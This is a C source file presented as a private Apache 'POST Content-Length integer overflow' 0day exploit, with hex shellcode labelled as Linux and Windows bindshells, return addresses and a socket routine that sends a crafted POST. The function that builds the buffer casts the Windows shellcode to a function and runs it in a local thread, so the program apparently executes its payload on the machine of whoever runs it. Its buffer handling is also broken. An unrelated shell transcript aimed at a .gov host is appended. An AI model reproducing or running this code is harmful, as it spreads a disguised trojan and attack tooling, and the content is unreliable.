/*
[!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!]
 
                       [!Division by Infinity!]
                              presents
 
 
              ,    ,      /\   /\              /(   )\
            /( /\ )\  _\ \_/ /_            \ \_/ /   , /\ ,
           |\_||_/| < \_   _/ >          /_   _\  /| || |\
           \______/  \|0   0|/          | \> </ | |\_||_/|
              _\/_   _(_  ^  _)_         (_  ^  _)  \____/
              ( () ) /`\|V"""V|/`\      /`\|IIIII|/`\ _\/_
                {}   \  \_____/  /      \  \_____/  /  ()
                ()   /\   )=(   /\      /\   )=(   /\  ()
               {}  /  \_/\=/\_/  \    /  `-.\=/.-'  \ ()
 
               Apache <= 2.x POST Content-Length integer overflow
                                 !0DAY!
 
                             by Mindphuck/[!DBI!]
 
 
               This is fsck1n pr1v8, r3l34z3 d1z t0 th3 wh1th8 c0mmUn1ty 4nd
               w3 w1ll t34r y0ur fuqin h34d 0v!1!
 
[!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!]
*/
 
// Fixed compile bugs for GCC compiller, untested... KOrUPt.
 
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
 
//linux bindshell on port 4444
const char* scode1 =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x30"
"\x2c\xd6\x7f\x83\xeb\xfc\xe2\xf4\x01\xf7\x85\x3c\x63\x46\xd4\x15"
"\x56\x74\x4f\xf6\xd1\xe1\x56\xe9\x73\x7e\xb0\x17\x21\x70\xb0\x2c"
"\xb9\xcd\xbc\x19\x68\x7c\x87\x29\xb9\xcd\x1b\xff\x80\x4a\x07\x9c"
"\xfd\xac\x84\x2d\x66\x6f\x5f\x9e\x80\x4a\x1b\xff\xa3\x46\xd4\x26"
"\x80\x13\x1b\xff\x79\x55\x2f\xcf\x3b\x7e\xbe\x50\x1f\x5f\xbe\x17"
"\x1f\x4e\xbf\x11\xb9\xcf\x84\x2c\xb9\xcd\x1b\xff";
 
//win32 bindshell on port 4444
const char* scode2 =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa0"
"\xa7\x83\x65\x83\xeb\xfc\xe2\xf4\x5c\xcd\x68\x28\x48\x5e\x7c\x9a"
"\x5f\xc7\x08\x09\x84\x83\x08\x20\x9c\x2c\xff\x60\xd8\xa6\x6c\xee"
"\xef\xbf\x08\x3a\x80\xa6\x68\x2c\x2b\x93\x08\x64\x4e\x96\x43\xfc"
"\x0c\x23\x43\x11\xa7\x66\x49\x68\xa1\x65\x68\x91\x9b\xf3\xa7\x4d"
"\xd5\x42\x08\x3a\x84\xa6\x68\x03\x2b\xab\xc8\xee\xff\xbb\x82\x8e"
"\xa3\x8b\x08\xec\xcc\x83\x9f\x04\x63\x96\x58\x01\x2b\xe4\xb3\xee"
"\xe0\xab\x08\x15\xbc\x0a\x08\x25\xa8\xf9\xeb\xeb\xee\xa9\x6f\x35"
"\x5f\x71\xe5\x36\xc6\xcf\xb0\x57\xc8\xd0\xf0\x57\xff\xf3\x7c\xb5"
"\xc8\x6c\x6e\x99\x9b\xf7\x7c\xb3\xff\x2e\x66\x03\x21\x4a\x8b\x67"
"\xf5\xcd\x81\x9a\x70\xcf\x5a\x6c\x55\x0a\xd4\x9a\x76\xf4\xd0\x36"
"\xf3\xf4\xc0\x36\xe3\xf4\x7c\xb5\xc6\xcf\x92\x39\xc6\xf4\x0a\x84"
"\x35\xcf\x27\x7f\xd0\x60\xd4\x9a\x76\xcd\x93\x34\xf5\x58\x53\x0d"
"\x04\x0a\xad\x8c\xf7\x58\x55\x36\xf5\x58\x53\x0d\x45\xee\x05\x2c"
"\xf7\x58\x55\x35\xf4\xf3\xd6\x9a\x70\x34\xeb\x82\xd9\x61\xfa\x32"
"\x5f\x71\xd6\x9a\x70\xc1\xe9\x01\xc6\xcf\xe0\x08\x29\x42\xe9\x35"
"\xf9\x8e\x4f\xec\x47\xcd\xc7\xec\x42\x96\x43\x96\x0a\x59\xc1\x48"
"\x5e\xe5\xaf\xf6\x2d\xdd\xbb\xce\x0b\x0c\xeb\x17\x5e\x14\x95\x9a"
"\xd5\xe3\x7c\xb3\xfb\xf0\xd1\x34\xf1\xf6\xe9\x64\xf1\xf6\xd6\x34"
"\x5f\x77\xeb\xc8\x79\xa2\x4d\x36\x5f\x71\xe9\x9a\x5f\x90\x7c\xb5"
"\x2b\xf0\x7f\xe6\x64\xc3\x7c\xb3\xf2\x58\x53\x0d\x50\x2d\x87\x3a"
"\xf3\x58\x55\x9a\x70\xa7\x83\x65";
 
char* sc = NULL;
char* hellcode = NULL;
 
struct Target
{
   char* Ident;
   char* RetAddr;
};
 
struct Target TR[8] = {
                       "Windows XP 5.1.0.0 SP0 (IA32)",
                         "\x1c\x80\xf5\x77", // jmp *%esp @ ntdll.dll
                       "Windows NT 4.0.6.0 SP6 (IA32)",
                         "\x63\xD4\xF9\x77", // jmp *%esp @ ntdll.dll
                       "Windows 2000 5.0.1.0 SP1 (IA32)",
                         "\xAB\x67\xF9\xFF", // jmp *%esp @ ntdll.dll
                       "Windows 2003 Server 5.2.0.0 SP0 (IA32)",
                         "\xAB\x8B\xFB\x77", // jmp *%esp @ ntdll.dll
                       "Windows 2003 Server 5.2.1.0 SP1 (IA32)",
                         "\xD3\xFE\x86\x7C", // jmp *%esp @ ntdll.dll
                       "Windows XP 5.1.2.0 SP2 (IA32)",
                         "\xED\x1E\x94\x7C", // jmp *%esp @ ntdll.dll
                       "Linux 2.4.x Kernel",
                         "\x25\xE7\xFF\xFF", // jmp *%esp @ linux-gate.so.1
                       "Linux 2.6.x Kernel",
                         "\x77\xE7\xFF\xFF", // jmp *%esp @ linux-gate.so.1
                     };
 
void SetHellcode(int TG)
{
  if(TG > 5) // linux
  {
    hellcode = (char*)malloc(strlen(scode1));
    memset(hellcode,0,strlen(scode1));
    strcpy(hellcode,scode1);
  }
  else // windows
  {
    hellcode = (char*)malloc(strlen(scode2));
    memset(hellcode,0,strlen(scode2));
    strcpy(hellcode,scode2);
  }
}
 
void ConstructBuffer(int TG)
{
  int i;
  SetHellcode(TG);
  sc = (char*)malloc(strlen(hellcode));
  memset(sc,0,strlen(hellcode));
 
  for(i = 4; i < 1024; i++)
    sc[i] = 0x90; // NOP-sled
  for(i = 0; i < 4; i++)
    sc[i+1024] = TR[TG].RetAddr[i];
 
  strncpy(sc+1028,hellcode,strlen(hellcode)); // shellcode
  int (*f)() = (int(*)())scode2;
 
  DWORD dwThread;
  HANDLE th = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)f, NULL, 0, &dwThread);
  WaitForSingleObject(th, INFINITE);
}
 
void Usage()
{
  int x = 0;
  printf("Usage: lulz.exe <Target> <Port> <Details>\n");
  printf("[*]Detail list: \n");
  for(x = 0; x < 8; x++)
    printf("[%d]%s\n",x,TR[x].Ident);
  printf("\nExample: lulz.exe localhost 80 1\n");
  exit(1);
}
 
int main(int argc, char *argv[])
{
  SOCKET s;
  struct sockaddr_in sin;
  struct hostent *he;
 
  char buffer[2048];
  char *p2;
  int x = 0;
  unsigned short iPort = 80;
  WSADATA wsa_prov;
 
  printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n");
  printf("[!Priv8 Apache <= 2.x Exploit!]\r\n");
  printf("[!       by Mindphuck/[!DBI!]   !]\r\n");
  printf("[! Apache <= 2.x POST Content-Length integer overflow!]\r\n");
  printf("[! Leads to remote code execution    !]\r\n");
  printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n");
  if(argc < 4)
    Usage();
 
  iPort = atoi(argv[2]);
  x = atoi(argv[3]);
  if(x < 0 || x > 7)
  {
    printf("[-]Invalid Details ...\n");
    exit(1);
  }
 
  printf("[*]Attacking %s:%d running %s...\n",argv[1],iPort,TR[x].Ident);
  ConstructBuffer(x);
  if (WSAStartup(0x0101, &wsa_prov)) {
    perror("[-]WSAStartup error");
    exit(1);
  }
 
  he = gethostbyname(argv[1]);
  if (!he) {
    perror("gethostbyname");
    exit(1);
  }
  sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
  memset(buffer,0,2048);
  sprintf(buffer,"POST /index.php HTTP/1.0\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s\r\n",0x7FFFFFFF,sc);
 
  s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (s < 0) {
    perror("[-]Socket error...");
    exit(1);
  }
 
  sin.sin_family = AF_INET;
  sin.sin_port = htons(iPort);
  if (connect(s, (const struct sockaddr*)&sin, sizeof(struct sockaddr_in))) {
    perror("[-]Connection error...");
    exit(1);
  }
 
  if(send(s, buffer, 2048, 0))
    printf("[+]Exploit successfull, shellcode executed ...\n[+]h4rzh4rz, t4rg3t pWn3d!1!11!\n");
  else
    printf("[-]Send error...\n");
 
    closesocket(s);
    WSACleanup();
    if(hellcode)
      free(hellcode);
    if(sc)
      free(sc);
 
    exit(0);
}

pi3-darkstar ~ # gcc Apache_0day.c -o Apache_0day
pi3-darkstar ~ # ./Apache_0day -h

    ...::: -=[ Apache 2.2.xx 0day exploit  (by Adam 'pi3' Zabrocki) ]=- :::...

    Usage: ./Apache_0day <options>

        Options:
             -v <victim>
             -p <port>
             -h this help screen

 pi3-darkstar ~ # ./Apache_0day -v xxx.gov